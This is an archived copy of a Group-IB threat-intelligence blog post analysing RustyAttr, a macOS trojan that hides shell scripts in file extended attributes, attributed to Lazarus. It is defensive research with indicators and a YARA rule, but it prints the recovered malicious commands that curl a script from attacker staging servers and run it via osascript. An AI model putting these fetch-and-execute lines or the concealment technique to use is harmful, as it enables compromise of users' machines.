{ "id": "c3602b8b-86af-4c00-8b86-b7b99e113f33", "created_at": "2026-04-06T00:12:59.272059Z", "updated_at": "2026-04-10T13:12:09.607918Z", "deleted_at": null, "sha1_hash": "0388088a0579a282771d24237f046c6daaaa0843", "title": "Stealthy Attributes of APT Lazarus Group | Group-IB Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 675837, "plain_text": "Sharmine Low\r\nMalware Analyst, APAC\r\nStealthy Attributes of Lazarus\r\nAPT Group: Evading Detection\r\nwith Extended Attributes\r\nThe simple way of stealth, if it works, it works.\r\nIn this blog, we examine a fresh take on techniques regarding concealing codes in Extended\r\nAttributes in order to evade detection in macOS systems. This is a new technique that has yet to be\r\nincluded in the MITRE ATT\u0026CK framework.\r\nNovember 13, 2024 · min to read · Advanced Persistent Threats\r\n← Blog\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 1 of 18\n\nAPT Extended Attributes Lazarus macOS Rust xattr\r\nIntroduction\r\nLazarus APT group has begun attempting to smuggle code using custom extended attributes.\r\nExtended attributes are metadata that can be associated with files and directories in various file\r\nsystems. They allow users to store additional information about a file beyond the standard attributes\r\nlike file size, timestamps, and permissions.\r\nWhile researching malware abusing extended attributes, the most similar technique found was one\r\nback in 2020, where Bundlore adware hid its payload in resource forks, and accessed via the special\r\npath `filename/..namedfork/rsrc`. A resource fork is a special part of a file on older macOS (and\r\nclassic Mac OS) systems that was used to store structured data associated with the file. It was used\r\nto store things like icons, custom window layouts, and other file-specific settings or resources.\r\nResource forks are largely deprecated in modern macOS, having been replaced with the application\r\nbundle structure and extended attributes. So, why not hide the code within custom extended\r\nattributes instead?\r\nWe have encountered only a few samples in the wild and cannot definitively confirm any victims\r\nfrom this incident. It is also possible that they are experimenting with methods for concealing code\r\nwithin the macOS files.\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 2 of 18\n\nKey discoveries in the blog\r\nGroup-IB researchers have identified a new technique that has yet to be included in MITRE\r\nATT\u0026CK framework – Code smuggling using extended attributes.\r\nGroup-IB researchers discovered a new macOS trojan dubbed RustyAttr.\r\nTrojans were developed using the Tauri framework, originally signed with a leaked certificate that\r\nwas later revoked.\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 3 of 18\n\nWho may find this blog interesting:\r\nHiding in Attributes\r\nThe figure below illustrates the execution flow. We will begin by examining the extended attributes.\r\nFigure 1: Overview of execution flow\r\nExtended Attributes (EAs) are metadata that can be associated with files and directories in various\r\nfile systems. These are not seen directly in the Finder nor the Terminal, but using `xattr`, we can\r\nextract and see the attributes with ease. The threat actor has defined an extended attribute of\r\ncustom type “test”.\r\nFiles are fully undetected on VirusTotal.\r\nActivity is attributed to APT Lazarus group with moderate confidence.\r\nCybersecurity analysts and corporate security teams\r\nDigital Forensics specialists\r\nMalware analysts\r\nThreat intelligence specialists\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 4 of 18\n\nFigure 2: Using xattr to extract extended attributes\r\n(curl -o \"/Users/Shared/Discussion Points for Synergy Exploration.pdf\" \"hxxps://filedn.com\r\n\u0026\u0026 (open \"/Users/Shared/Discussion Points for Synergy Exploration.pdf\" || true)\r\n\u0026\u0026 (shell=$(curl -L -k \"hxxps://support.cloudstore[.]business/256977/check\");\r\nosascript -e \"do shell script $shell\")\r\nAnother variant with dialog:\r\n(osascript -e 'display dialog \"This app does not support this version.\" buttons {\"OK\"} def\r\n\u0026\u0026 (shell=$(curl -L -k \"hxxps://support.docsend[.]site/519529/check\");\r\nosascript -e \"do shell script $shell\")\r\nExecution\r\nThe offending applications were developed using the Tauri framework. Tauri is a framework for\r\nbuilding lightweight desktop applications using web technologies. It allows developers to create\r\napplications with a web frontend (HTML, CSS, JavaScript) while leveraging Rust for the backend.\r\nThe application will fetch and execute the malicious script located in the extended attributes.\r\nAfter examining the shell scripts, we know that decoys will be displayed. We identified two different\r\ntypes of decoys. For the first type of decoy, it actually fetches a PDF file from a file hosting service\r\nat filedn[.]com. The questions inside the “Investment Decision-Making Questionnaire” are related to\r\ndevelopment and funding of game projects. The second decoy is just a dialog displaying a message\r\nthat “This app does not support this version”. Meanwhile, the web request to the staging server\r\nprocesses in the background.\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 5 of 18\n\nFigure 3: Decoy PDF downloaded and open\r\nFigure 4: Second variant displaying a fake dialog\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 6 of 18\n\nFigure 5: Other related PDF that were found hosted on the file hosting service\r\nHow was it triggered?\r\nThe threat actor (TA) took a roundabout approach to trigger the execution, possibly aiming to make\r\nthemselves less noticeable and harder to trace. Upon executing the application, the Tauri\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 7 of 18\n\napplication attempts to render a HTML webpage using a WebView. The TA used some random\r\ntemplate pulled off the internet. However within these webpages, we observed that there was an\r\nadditional suspicious javascript named “preload.js” loaded.\r\nFigure 6: Random web template TA used\r\nTauri provides a foreign function interface that allows the JavaScript code to call Rust functions.\r\nThis is useful for tasks that require performance or direct system access that JavaScript cannot\r\nhandle effectively. The `invoke` function is an Application Programming Interface (API) in Tauri that\r\nfacilitates communication between the frontend (JavaScript) and backend (Rust), effectively\r\nallowing the frontend to invoke Rust functions, pass arguments, and receive data.\r\nWhat it does here is pretty simple – using `get_application_properties` provided by the application’s\r\nbackend, it fetches the content from the extended attributes named “test” from the file and then\r\npasses it to `run_command`. This is where the shell script gets executed.\r\nInterestingly, the next behavior is as follows – if the attribute exists, no user interface will be shown\r\nwhereas, if the attribute is absent, the fake webpage will be shown.\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 8 of 18\n\nFigure 7: Code snippet of preload.js\r\nFigure 8: Code snippet of get_application_properties\r\nInterface Commands\r\nThese commands here are actually not that all important, as these are not Command-and-Control\r\ncommands but rather its an interface for the frontend to invoke, to fetch and execute the script\r\nlocated in the extended attributes. Nonetheless, we will still provide a description here.\r\nInterface Commands Description\r\nget_application_path Get path of current executable\r\nget_application_properties Retrieve content from specified extended attributes\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 9 of 18\n\nrun_command Execute scripts/commands passed to it\r\nshow_main_window Display webview\r\nclose_main_window Kill all Tauri processes and exit\r\nFigure 9: Available interface commands\r\nDetections\r\nAt the time of our analysis, the files are fully undetected on VirusTotal, likely due to the fact that the\r\nmalicious components are concealed within the attributes.\r\nFigure 10: VirusTotal detections\r\nThese applications were likely signed using a leaked certificate that has since been revoked by\r\nApple. A silver lining is that these applications were unnotarized. It remains unknown if there were\r\nany victims prior to the revocation. Currently, macOS Gatekeeper prevents the execution of these\r\napplications, unless the user chooses to override these protections.\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 10 of 18\n\nFigure 11: Previous status – signed but unnotarized\r\nFigure 12: Current status – certificate revoked\r\nLazarus group\r\nUnfortunately, the next stage was not available for download at the time of our research. However,\r\nthe staging server it connects to for fetching the next stage was identified as part of the Lazarus\r\ninfrastructure back in May 2024.\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 11 of 18\n\nFigure 13: Group-IB’s Graph showing links among Lazarus IOCs\r\nThe decoy PDFs and one of the malicious application bundles were hosted on a public folder of a\r\nfile sharing service named pCloud. The associated account was also seen hosting the “Dedicated\r\nPDF Viewer.zip” file which has been known to exhibit the features of RustBucket malware utilized by\r\nLazarus group back in 2023. The public folder of the account was hosting these files below. The\r\noverall theme of employment opportunities and cryptocurrency aligns with Lazarus.\r\nHowever, judging from our analysis of our samples and the PDF viewer revealed no further\r\nmalicious payloads, no confirmed victims, we remain cautious in attributing this to Lazarus group,\r\nplacing our confidence only at a moderate level.\r\nFolder Files\r\nmymymy Dedicated Pdf Viewer.zip\r\npdf Backed Finance – 2024 Q2.pdf\r\nDeepti G N Resume-2023.pdf\r\nDhagash’s CV.pdf\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 12 of 18\n\nFrontier __ KCC Chain.pdf\r\nInvestment Opportunity – Fenbushi Capital.pdf\r\npitch-deck.pdf\r\nStablecoin Risks You can’t Ignore.pdf\r\nThena update – July 2024.pdf\r\nTruflation Latest Update – July 2024_.pdf\r\nWin.zip\r\ntencent Voov meeting (portable).zip\r\ndragonfly\r\nInvestment Decision-Making Questionnaire_U.pdf\r\nInvestment Decision-Making Questionnaire_t3rn.pdf\r\nConclusion\r\nIn conclusion, the technique of hiding code in extended attributes effectively bypassed most\r\nantivirus scanners. Fortunately, macOS systems provide some level of protection for the found\r\nsamples. To trigger the cyberattack, users must disable Gatekeeper by overriding malware\r\nprotection. It is likely that some degree of interaction and social engineering will be necessary to\r\nconvince victims to take these steps. However, this may not be the case for possibly other future\r\nsamples that are properly signed and notarized, or coupled with macOS Gatekeeper bypasses.\r\nLazarus group remains a sophisticated and evolving cyber threat, continually enhancing their\r\narsenal with new tools and methods to bypass defenses. We anticipate that this tool may soon be\r\nutilized in future cyberattacks after it has been made further robust – with code signing,\r\nnotarization, obfuscation, and a more inconspicuous custom attribute name.\r\nRecommendations\r\nStay alert to any requests asking you to download, open, or execute files. Always verify the\r\nsource and ensure it’s trustworthy before proceeding, in order to protect your device and data\r\nfrom potential cyber threats.\r\nDo not disable macOS Gatekeeper or allow applications from unidentified developers. Keeping\r\nGatekeeper enabled helps protect your system from potentially harmful software.\r\nKeeping your organization secure requires ongoing vigilance. Utilizing a proprietary solution like\r\nGroup-IB’s Threat Intelligence can enhance your security posture by providing teams with\r\nadvanced insights into emerging cyber threats allowing you to identify potential risks sooner\r\nand implement defenses more proactively.\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 13 of 18\n\nMITRE ATT\u0026CK\r\nT1059.002 Command and Scripting Interpreter: AppleScript\r\nT1059.004 Command and Scripting Interpreter: Unix Shell\r\nT1564 Hide Artifacts\r\nT1105 Ingress Tool Transfer\r\nIndicators of Compromise (IOCs)\r\nNetwork IOCS\r\nsupport[.]cloudstore[.]business\r\nsupport[.]docsend[.]site\r\n104.168.165[.]203\r\n104.168.157[.]45\r\nhxxps://filedn[.]com/lY24cv0IfefboNEIN0I9gqR\r\nFile hashes\r\nFilenames SHA256\r\nDiscussion Points for\r\nSynergy\r\nExploration.app.zip\r\n7464850d7d6891418c503d0e1732812d7703d6c1fd5cf3c821f3c202786f942\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 14 of 18\n\nInvestment Decision-Making\r\nQuestionnaire.app.zip\r\nf3e6e8df132155daf1d428dff61f0ca53ecd02015a0a0bbe1ad237519ab3cb58\r\nInvestment Decision-Making\r\nQuestionnaire.app.zip\r\ne87177e07ab9651b48664c3d22334248e012e8a2bab02f65c93fedd79af0a7\r\nVooV.app.zip 022344029b8bf951ba02b11025fe26c99193cb7c8a482c33862c9bbaa5e552\r\nVoov meeting\r\n(portable).zip\r\n9111d458d5665b1bf463859792e950fe8d8186df9a6a3241360dc11f34d018\r\nYARA Rules\r\nrule rustyattr\r\n{\r\n meta:\r\n author = \"Sharmine Low\"\r\n company = \"Group-IB\"\r\n family = \"rustyattr\"\r\n description = \"Detects rust binary of rustyattr\"\r\n severity = 9\r\n date = \"2024-10-30\"\r\n sample = \"176e8a5a7b6737f8d3464c18a77deef778ec2b9b42b7e7eafc888aeaf2758c2d\"\r\n strings:\r\n $s1 = \"run_command\"\r\n $s2 = \"get_application_properties\"\r\n $s3 = \"get_application_path\"\r\n $s4 = \"close_main_window\"\r\n $s5 = \"show_main_window\"\r\n $r1 = \"window.__TAURI__.\"\r\n condition:\r\n all of ($s*) and $r1\r\n}\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 15 of 18\n\nSupercharge your cybersecurity with\r\nGroup-IB Threat Intelligence\r\nShare this article\r\nFound it interesting? Don't hesitate to share it to wow your friends or colleagues\r\nRequest a demo\r\nResources\r\nResearch Hub\r\nSuccess Stories\r\nKnowledge Hub\r\nCertificates\r\nWebinars\r\nProducts\r\nThreat Intelligence\r\nFraud Protection\r\nManaged XDR\r\nAttack Surface Management\r\nDigital Risk Protection\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 16 of 18\n\nPodcasts\r\nTOP Investigations\r\nRansomware Notes\r\nAI Cybersecurity Hub\r\nBusiness Email Protection\r\nCyber Fraud Intelligence\r\nPlatform\r\nUnified Risk Platform\r\nIntegrations\r\nPartners\r\nPartner Program\r\nMSSP and MDR Partner\r\nProgram\r\nTechnology Partners\r\nPartner Locator\r\nCompany\r\nAbout Group-IB\r\nTeam\r\nCERT-GIB\r\nCareers\r\nInternship\r\nAcademic Aliance\r\nSustainability\r\nMedia Center\r\nContact\r\nAPAC: +65 3159 3798\r\nEU \u0026 NA: +31 20 226 90 90\r\nMEA: +971 4 568 1785\r\ninfo@group-ib.com\r\nSubscription plans Services Resource Center\r\nSubscribe to stay up to date with the\r\nlatest cyber threat trends\r\nContact\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 17 of 18\n\n© 2003 – 2026 Group-IB is a global leader in the fight against cybercrime, protecting customers\r\naround the world by preventing breaches, eliminating fraud and protecting brands.\r\nTerms of Use Cookie Policy Privacy Policy\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 18 of 18\n\n https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/ \nFigure 3: Decoy PDF downloaded and open \nFigure 4: Second variant displaying a fake dialog\n Page 6 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE" ], "origins": [ "web" ], "references": [ "https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/" ], "report_names": [ "stealthy-attributes-of-apt-lazarus" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "649b5b3e-b16e-44db-91bc-ae80b825050e", "created_at": "2022-10-25T15:50:23.290412Z", "updated_at": "2026-04-10T02:00:05.257022Z", "deleted_at": null, "main_name": "Dragonfly", "aliases": [ "TEMP.Isotope", "DYMALLOY", "Berserk Bear", "TG-4192", "Crouching Yeti", "IRON LIBERTY", "Energetic Bear", "Ghost Blizzard" ], "source_name": "MITRE:Dragonfly", "tools": [ "MCMD", "Impacket", "CrackMapExec", "Backdoor.Oldrea", "Mimikatz", "PsExec", "Trojan.Karagany", "netsh" ], "source_id": "MITRE", "reports": null }, { "id": "1a76ed30-4daf-4817-98ae-87c667364464", "created_at": "2022-10-25T16:47:55.891029Z", "updated_at": "2026-04-10T02:00:03.646466Z", "deleted_at": null, "main_name": "IRON LIBERTY", "aliases": [ "ALLANITE ", "ATK6 ", "BROMINE ", "CASTLE ", "Crouching Yeti ", "DYMALLOY ", "Dragonfly ", "Energetic Bear / Berserk Bear ", "Ghost Blizzard ", "TEMP.Isotope ", "TG-4192 " ], "source_name": "Secureworks:IRON LIBERTY", "tools": [ "ClientX", "Ddex Loader", "Havex", "Karagany", "Loek", "MCMD", "Sysmain", "xfrost" ], "source_id": "Secureworks", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434379, "ts_updated_at": 1775826729, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0388088a0579a282771d24237f046c6daaaa0843.pdf", "text": "https://archive.orkl.eu/0388088a0579a282771d24237f046c6daaaa0843.txt", "img": "https://archive.orkl.eu/0388088a0579a282771d24237f046c6daaaa0843.jpg" } }